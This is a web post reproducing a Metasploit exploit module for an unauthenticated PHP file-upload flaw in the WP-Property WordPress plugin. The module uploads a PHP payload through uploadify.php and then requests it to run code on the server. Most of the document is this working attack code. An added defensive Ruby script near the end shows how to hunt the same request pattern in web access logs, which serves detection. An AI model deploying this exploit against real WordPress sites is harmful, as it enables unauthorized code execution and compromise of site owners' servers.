
WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. I'm talking about msf.
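For defenders, the request pattern in the module above (a POST to uploadify.php, then a request for a script in the same directory) can be hunted in web access logs. The following is an added example, not part of the original post or of Metasploit; it assumes Apache/nginx combined log format, and the sample log lines, IP addresses and file names are constructed.

```ruby
require 'cgi'

# Directory taken from the module above; log format assumed to be "combined".
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<verb>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3})/
SCRIPT_EXT = /\.(?:php\d?|phtml|phar)\z/i

# Constructed sample lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = <<~'LOG'
  198.51.100.4 - - [04/Jan/2013:19:40:00 +0800] "GET /wordpress/ HTTP/1.1" 200 5120
  203.0.113.7 - - [04/Jan/2013:19:41:10 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 78
  203.0.113.7 - - [04/Jan/2013:19:41:11 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/AbCdE.php HTTP/1.1" 200 0
  198.51.100.9 - - [04/Jan/2013:19:45:02 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 900
  198.51.100.23 - - [04/Jan/2013:19:50:30 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/%71wert.PHP?x=1 HTTP/1.1" 404 0
LOG

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  path = CGI.unescape(m[:path].split('?', 2).first) # drop query, undo %-encoding
  { ip: m[:ip], ts: m[:ts], verb: m[:verb], path: path, status: m[:status].to_i }
end

# Returns one finding per suspicious line: any POST to uploadify.php, and any
# request for a script other than uploadify.php inside the uploadify directory.
# A script request from a client that POSTed earlier is rated higher.
def detect_uploadify_abuse(log_text)
  posted = {} # client IPs that already POSTed to uploadify.php
  log_text.each_line.map do |line|
    e = parse_line(line.chomp) or next
    i = e[:path].index(UPLOADIFY_DIR) or next
    file = e[:path][(i + UPLOADIFY_DIR.length)..-1]
    if e[:verb] == 'POST' && file == 'uploadify.php'
      posted[e[:ip]] = true
      e.merge(kind: :upload_post)
    elsif file =~ SCRIPT_EXT && file != 'uploadify.php'
      e.merge(kind: posted[e[:ip]] ? :upload_then_script_request : :script_in_upload_dir)
    end
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  detect_uploadify_abuse(SAMPLE_LOG).each { |f| puts f.values_at(:kind, :ip, :ts, :path).join("\t") }
end
```

Findings are reported regardless of response status: the module requests its payload with `:unlink_self=>true`, so the uploaded file may already be gone when the log is reviewed.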